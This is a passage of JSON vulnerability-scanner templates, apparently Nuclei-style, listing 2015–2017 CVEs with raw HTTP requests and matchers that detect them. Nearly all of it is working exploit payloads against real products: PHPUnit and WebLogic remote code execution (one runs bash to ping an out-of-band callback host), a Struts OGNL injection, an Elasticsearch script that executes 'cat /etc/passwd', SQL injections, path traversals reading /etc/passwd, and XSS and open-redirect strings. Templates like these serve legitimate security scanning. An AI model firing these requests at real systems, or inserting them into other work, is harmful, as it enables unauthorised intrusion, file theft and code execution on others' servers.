/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site 